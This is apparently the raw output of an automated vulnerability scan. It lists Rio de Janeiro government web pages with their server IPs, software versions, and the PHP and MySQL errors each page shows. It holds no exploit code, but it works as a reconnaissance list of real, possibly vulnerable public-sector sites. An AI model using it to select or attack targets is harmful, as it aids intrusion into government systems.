/ HTTP_CODE: 200  / IP SERVER: 201.18.168.67  / PORTA SERVER: 80  / WEB SERVER: Server: Apache
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[45] - www.viiisenabom.rj.gov.br/defencil/eng/index_eng.php
/ HTTP_CODE: 200  / IP SERVER: 201.18.168.67  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[46] - http://www.faetec.rj.gov.br/dde/moodle_dde/help.php?module=lesson&file=questiontypes.html&forcelang=en_utf8
/ HTTP_CODE: 200  / IP SERVER: 200.141.74.163  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.22 (Ubuntu)
[47] - www.faetec.rj.gov.br/dde/moodle_dde/help.php?module=lesson...
/ HTTP_CODE: 200  / IP SERVER: 200.141.74.163  / PORTA SERVER: 80  / WEB SERVER:
[48] - http://camaramage.rj.gov.br/wp-content/plugins/aviberry-wordpress-video-conversion-plug-in/tpl/preset_dialogs.php
/ HTTP_CODE: 200  / IP SERVER: 108.179.254.172  / PORTA SERVER: 80  / WEB SERVER: Server: Apache
Tipo de erro: INDEFINIDO-02 - ERRO: Fatal error
[49] - http://www.pmnf.rj.gov.br/m_friburgo_parque.php
/ HTTP_CODE: 200  / IP SERVER: 189.1.48.22  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.10 mod_perl/2.0.5 Perl/v5.8.8
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[50] - www.pmnf.rj.gov.br/m_friburgo_parque.php
/ HTTP_CODE: 200  / IP SERVER: 189.1.48.22  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[51] - http://www.dgo.cbmerj.rj.gov.br/modules.php?name=Web_Links&l_op=viewlink&cid=19&orderby=dateA
/ HTTP_CODE: 200  / IP SERVER: 201.18.168.67  / PORTA SERVER: 80  / WEB SERVER: Server: Apache
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[52] - www.dgo.cbmerj.rj.gov.br/modules.php?name...l...
/ HTTP_CODE: 200  / IP SERVER: 201.18.168.67  / PORTA SERVER: 80  / WEB SERVER:
[53] - http://www.dgo.cbmerj.rj.gov.br/modules.php?name=Web_Links&l_op=viewlink&cid=19
/ HTTP_CODE: 200  / IP SERVER: 201.18.168.67  / PORTA SERVER: 80  / WEB SERVER: Server: Apache
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[54] - www.dgo.cbmerj.rj.gov.br/modules.php?name=Web...
/ HTTP_CODE: 200  / IP SERVER: 201.18.168.67  / PORTA SERVER: 80  / WEB SERVER:
[55] - http://www.dgo.cbmerj.rj.gov.br/modules.php?name=Web_Links&l_op=viewlink&cid=14
/ HTTP_CODE: 200  / IP SERVER: 201.18.168.67  / PORTA SERVER: 80  / WEB SERVER: Server: Apache
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[56] - http://www.dgo.cbmerj.rj.gov.br/modules.php?name=Web_Links&l_op=viewlink&cid=14&orderby=titleA
/ HTTP_CODE: 200  / IP SERVER: 201.18.168.67  / PORTA SERVER: 80  / WEB SERVER: Server: Apache
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[57] - http://www.dgo.cbmerj.rj.gov.br/modules.php?name=Web_Links&l_op=viewlink&cid=14&orderby=titleD
/ HTTP_CODE: 200  / IP SERVER: 201.18.168.67  / PORTA SERVER: 80  / WEB SERVER: Server: Apache
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[58] - http://www.dgo.cbmerj.rj.gov.br/modules.php?name=Web_Links&l_op=viewlink&cid=14&orderby=dateD
/ HTTP_CODE: 200  / IP SERVER: 201.18.168.67  / PORTA SERVER: 80  / WEB SERVER: Server: Apache
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[59] - http://dgo.cbmerj.rj.gov.br/modules.php?name=Web_Links&l_op=viewlink&cid=19&min=0&orderby=titleD&show=10
/ HTTP_CODE: 200  / IP SERVER: 201.18.168.67  / PORTA SERVER: 80  / WEB SERVER: Server: Apache
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[60] - http://dgo.cbmerj.rj.gov.br/modules.php?name=Web_Links&l_op=viewlink&cid=19&orderby=titleD
/ HTTP_CODE: 200  / IP SERVER: 201.18.168.67  / PORTA SERVER: 80  / WEB SERVER: Server: Apache
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[61] - http://www.saaedecasimiro.rj.gov.br/qualidagua/index1.php?start_from=26&ucat=&archive=&subaction=&id=&
/ HTTP_CODE: 200  / IP SERVER: 187.45.195.133  / PORTA SERVER: 80  / WEB SERVER: Content-Type: text/html
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[62] - www.saaedecasimiro.rj.gov.br/.../index1.php?start...
/ HTTP_CODE: 404  / IP SERVER: 187.45.195.133  / PORTA SERVER: 80  / WEB SERVER:
[63] - http://www.dgo.cbmerj.rj.gov.br/modules.php?name=Web_Links&l_op=viewlink&cid=19&min=0&orderby=titleA&show=10
/ HTTP_CODE: 200  / IP SERVER: 201.18.168.67  / PORTA SERVER: 80  / WEB SERVER: Server: Apache
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[64] - www.dgo.cbmerj.rj.gov.br/modules.php?...l...
/ HTTP_CODE: 200  / IP SERVER: 201.18.168.67  / PORTA SERVER: 80  / WEB SERVER:
[65] - http://www.dgo.cbmerj.rj.gov.br/modules.php?name=Web_Links&l_op=viewlink&cid=14&orderby=dateA
/ HTTP_CODE: 200  / IP SERVER: 201.18.168.67  / PORTA SERVER: 80  / WEB SERVER: Server: Apache
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[66] - http://www.pmnf.rj.gov.br/pagamento.php
/ HTTP_CODE: 200  / IP SERVER: 189.1.48.22  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.10 mod_perl/2.0.5 Perl/v5.8.8
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[67] - www.pmnf.rj.gov.br/pagamento.php
/ HTTP_CODE: 200  / IP SERVER: 189.1.48.22  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[68] - http://www.pmnf.rj.gov.br/hino_n.php
/ HTTP_CODE: 200  / IP SERVER: 189.1.48.22  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.10 mod_perl/2.0.5 Perl/v5.8.8
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[69] - www.pmnf.rj.gov.br/hino_n.php
/ HTTP_CODE: 200  / IP SERVER: 189.1.48.22  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[70] - http://www.voltaredonda.rj.gov.br/defesacivil/telefones.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.3 (Red Hat)
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[71] - www.voltaredonda.rj.gov.br/defesacivil/telefones.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[72] - http://www.pmnf.rj.gov.br/2-povos-1coracao.php
/ HTTP_CODE: 200  / IP SERVER: 189.1.48.22  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.10 mod_perl/2.0.5 Perl/v5.8.8
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[73] - www.pmnf.rj.gov.br/2-povos-1coracao.php
/ HTTP_CODE: 200  / IP SERVER: 189.1.48.22  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[74] - http://www.voltaredonda.rj.gov.br/servicos/cacamba_msg.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.3 (Red Hat)
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[75] - www.voltaredonda.rj.gov.br/servicos/cacamba_msg.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[76] - http://4gbm.cbmerj.rj.gov.br/modules.php?name=Web_Links&l_op=viewlink&cid=3
/ HTTP_CODE: 200  / IP SERVER: 201.18.168.67  / PORTA SERVER: 80  / WEB SERVER: Server: Apache
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[77] - http://www.4gbm.cbmerj.rj.gov.br/modules.php?name=Web_Links&l_op=viewlink&cid=8&orderby=titleA
/ HTTP_CODE: 200  / IP SERVER: 201.18.168.67  / PORTA SERVER: 80  / WEB SERVER: Server: Apache
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[78] - www.4gbm.cbmerj.rj.gov.br/modules.php?name...l...
/ HTTP_CODE: 200  / IP SERVER: 201.18.168.67  / PORTA SERVER: 80  / WEB SERVER:
[79] - http://www.4gbm.cbmerj.rj.gov.br/modules.php?name=Web_Links&l_op=viewlink&cid=8
/ HTTP_CODE: 200  / IP SERVER: 201.18.168.67  / PORTA SERVER: 80  / WEB SERVER: Server: Apache
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[80] - www.4gbm.cbmerj.rj.gov.br/modules.php?name=Web...
/ HTTP_CODE: 200  / IP SERVER: 201.18.168.67  / PORTA SERVER: 80  / WEB SERVER:
[81] - http://www.4gbm.cbmerj.rj.gov.br/modules.php?name=Web_Links&l_op=viewlink&cid=8&orderby=titleD
/ HTTP_CODE: 200  / IP SERVER: 201.18.168.67  / PORTA SERVER: 80  / WEB SERVER: Server: Apache
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[82] - http://www.4gbm.cbmerj.rj.gov.br/modules.php?name=Web_Links&l_op=viewlink&cid=8&orderby=dateA
/ HTTP_CODE: 200  / IP SERVER: 201.18.168.67  / PORTA SERVER: 80  / WEB SERVER: Server: Apache
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[83] - http://www.pmnf.rj.gov.br/m_iptjusto_m.php
/ HTTP_CODE: 200  / IP SERVER: 189.1.48.22  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.10 mod_perl/2.0.5 Perl/v5.8.8
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[84] - www.pmnf.rj.gov.br/m_iptjusto_m.php
/ HTTP_CODE: 200  / IP SERVER: 189.1.48.22  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[85] - http://www.itaocara.rj.gov.br/estrutura/galeria/janela.php?id=84&cidade=1
/ HTTP_CODE: 200  / IP SERVER: 69.64.52.47  / PORTA SERVER: 80  / WEB SERVER: Date: Sun, 13 Oct 2013 23:29:07 GMT
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[86] - www.itaocara.rj.gov.br/estrutura/galeria/janela.php?id=84...
/ HTTP_CODE: 200  / IP SERVER: 69.64.52.47  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[87] - www.itaocara.rj.gov.br/estrutura/galeria/janela.php?id=84&cidade=1
/ HTTP_CODE: 200  / IP SERVER: 69.64.52.47  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[88] - http://www.voltaredonda.rj.gov.br/destaque/ponto_eletronico.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.3 (Red Hat)
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[89] - www.voltaredonda.rj.gov.br/destaque/ponto_eletronico.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[90] - http://www.pmbp.rj.gov.br/index.php?option=com_smartformer&formid=4
/ HTTP_CODE: 200  / IP SERVER: 74.54.97.25  / PORTA SERVER: 80  / WEB SERVER: Server: Apache
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[91] - www.pmbp.rj.gov.br/index.php?option=com_smartformer...
/ HTTP_CODE: 404  / IP SERVER: 74.54.97.25  / PORTA SERVER: 80  / WEB SERVER:
[92] - http://www.pmnf.rj.gov.br/turismo_circuitos.php
/ HTTP_CODE: 200  / IP SERVER: 189.1.48.22  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.10 mod_perl/2.0.5 Perl/v5.8.8
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[93] - www.pmnf.rj.gov.br/turismo_circuitos.php
/ HTTP_CODE: 200  / IP SERVER: 189.1.48.22  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[94] - http://www.pmnf.rj.gov.br/gymbrasil.php
/ HTTP_CODE: 200  / IP SERVER: 189.1.48.22  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.10 mod_perl/2.0.5 Perl/v5.8.8
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[95] - www.pmnf.rj.gov.br/gymbrasil.php
/ HTTP_CODE: 200  / IP SERVER: 189.1.48.22  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[96] - http://novafriburgo.rj.gov.br/hino_n.php
/ HTTP_CODE: 200  / IP SERVER: 189.1.48.22  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.10 mod_perl/2.0.5 Perl/v5.8.8
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[97] - http://www.voltaredonda.rj.gov.br/destaque/cefet.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.3 (Red Hat)
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[98] - www.voltaredonda.rj.gov.br/destaque/cefet.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[99] - http://www.voltaredonda.rj.gov.br/servicos/cae/index.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.3 (Red Hat)
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[100] - www.voltaredonda.rj.gov.br/servicos/cae/index.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[101] - http://www.voltaredonda.rj.gov.br/destaque/juntamedica.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.3 (Red Hat)
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[102] - www.voltaredonda.rj.gov.br/destaque/juntamedica.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[103] - http://www.pmnf.rj.gov.br/pmconcorrencia.php
/ HTTP_CODE: 200  / IP SERVER: 189.1.48.22  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.10 mod_perl/2.0.5 Perl/v5.8.8
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[104] - www.pmnf.rj.gov.br/pmconcorrencia.php
/ HTTP_CODE: 200  / IP SERVER: 189.1.48.22  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[105] - http://www.voltaredonda.rj.gov.br/sme/mod/saed/aluno/ficha_individual/consulta/index.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.3 (Red Hat)
Tipo de erro: ERROPHP-03 - ERRO: Warning: require
[106] - www.voltaredonda.rj.gov.br/sme/mod/saed/aluno/.../index.php
/ HTTP_CODE: 404  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER:
[107] - http://www.pmnf.rj.gov.br/ebma.php
/ HTTP_CODE: 200  / IP SERVER: 189.1.48.22  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.10 mod_perl/2.0.5 Perl/v5.8.8
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[108] - www.pmnf.rj.gov.br/ebma.php
/ HTTP_CODE: 200  / IP SERVER: 189.1.48.22  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[109] - http://www.voltaredonda.rj.gov.br/cidade/relevo.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.3 (Red Hat)
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[110] - www.voltaredonda.rj.gov.br/cidade/relevo.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[111] - http://www.voltaredonda.rj.gov.br/destaque/faetec_cursos.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.3 (Red Hat)
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[112] - www.voltaredonda.rj.gov.br/destaque/faetec_cursos.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[113] - http://www.voltaredonda.rj.gov.br/cidade/clima.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.3 (Red Hat)
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[114] - www.voltaredonda.rj.gov.br/cidade/clima.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[115] - http://www.saaedecasimiro.rj.gov.br/news/show_news.php?subaction=showfull&id=1186482563&archive=&template=
/ HTTP_CODE: 200  / IP SERVER: 187.45.195.133  / PORTA SERVER: 80  / WEB SERVER: Content-Type: text/html
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[116] - www.saaedecasimiro.rj.gov.br/news/show_news.php?...
/ HTTP_CODE: 200  / IP SERVER: 187.45.195.133  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[117] - http://www.saaedecasimiro.rj.gov.br/news/comunicado.php
/ HTTP_CODE: 200  / IP SERVER: 187.45.195.133  / PORTA SERVER: 80  / WEB SERVER: Content-Type: text/html
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[118] - www.saaedecasimiro.rj.gov.br/news/comunicado.php
/ HTTP_CODE: 200  / IP SERVER: 187.45.195.133  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[119] - http://www.voltaredonda.rj.gov.br/defesacivil/reducao_desastres.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.3 (Red Hat)
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[120] - www.voltaredonda.rj.gov.br/defesacivil/reducao_desastres.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[121] - http://www.voltaredonda.rj.gov.br/destaque/mapas.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.3 (Red Hat)
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[122] - www.voltaredonda.rj.gov.br/destaque/mapas.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[123] - http://www.voltaredonda.rj.gov.br/destaque/banda.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.3 (Red Hat)
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[124] - www.voltaredonda.rj.gov.br/destaque/banda.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[125] - http://www.voltaredonda.rj.gov.br/cidade/hidrografia.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.3 (Red Hat)
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[126] - www.voltaredonda.rj.gov.br/cidade/hidrografia.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[127] - http://www.voltaredonda.rj.gov.br/destaque/salaempreendedor.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.3 (Red Hat)
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[128] - www.voltaredonda.rj.gov.br/destaque/salaempreendedor.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[129] - http://www.vr.rj.gov.br/defesacivil/escola_remo.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.3 (Red Hat)
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[130] - www.vr.rj.gov.br/defesacivil/escola_remo.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[131] - http://www.voltaredonda.rj.gov.br/projetos/proletramento.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.3 (Red Hat)
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[132] - www.voltaredonda.rj.gov.br/projetos/proletramento.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[133] - http://www.voltaredonda.rj.gov.br/destaque/projovem.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.3 (Red Hat)
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[134] - www.voltaredonda.rj.gov.br/destaque/projovem.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[135] - http://www.voltaredonda.rj.gov.br/destaque/reciclar.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.3 (Red Hat)
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[136] - www.voltaredonda.rj.gov.br/destaque/reciclar.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[137] - http://www.vr.rj.gov.br/defesacivil/defesacivil.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.3 (Red Hat)
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[138] - www.vr.rj.gov.br/defesacivil/defesacivil.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[139] - http://www.voltaredonda.rj.gov.br/destaque/forum_alimentacao.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.3 (Red Hat)
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[140] - www.voltaredonda.rj.gov.br/destaque/forum_alimentacao.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[141] - http://www.voltaredonda.rj.gov.br/cidade/ponto.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[142] - www.voltaredonda.rj.gov.br/cidade/ponto.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[143] - http://www.pmnf.rj.gov.br/secretarias_n.php
/ HTTP_CODE: 200  / IP SERVER: 189.1.48.22  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.10 mod_perl/2.0.5 Perl/v5.8.8
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[144] - www.pmnf.rj.gov.br/secretarias_n.php
/ HTTP_CODE: 200  / IP SERVER: 189.1.48.22  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[145] - http://www.cmresende.rj.gov.br/vr_vereador.php?nid=710
/ HTTP_CODE: 200  / IP SERVER: 187.45.240.72  / PORTA SERVER: 80  / WEB SERVER: Content-Type: text/html
Tipo de erro: MYSQL-01 - ERRO: mysql_
[146] - www.cmresende.rj.gov.br/vr_vereador.php?nid=710
/ HTTP_CODE: 200  / IP SERVER: 187.45.240.72  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: MYSQL-01 - ERRO: mysql_
[147] - http://www.voltaredonda.rj.gov.br/cidade/vegetacao.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.3 (Red Hat)
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[148] - www.voltaredonda.rj.gov.br/cidade/vegetacao.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[149] - http://www.voltaredonda.rj.gov.br/destaque/cederj.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.3 (Red Hat)
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[150] - www.voltaredonda.rj.gov.br/destaque/cederj.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[151] - http://www.voltaredonda.rj.gov.br/destaque/feimmep.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.3 (Red Hat)
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[152] - www.voltaredonda.rj.gov.br/destaque/feimmep.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[153] - http://www.voltaredonda.rj.gov.br/cidade/caracteristicas.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.3 (Red Hat)
[154] - www.voltaredonda.rj.gov.br/cidade/caracteristicas.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER:
[155] - http://www.voltaredonda.rj.gov.br/destaque/aguainga.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.3 (Red Hat)
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[156] - www.voltaredonda.rj.gov.br/destaque/aguainga.php
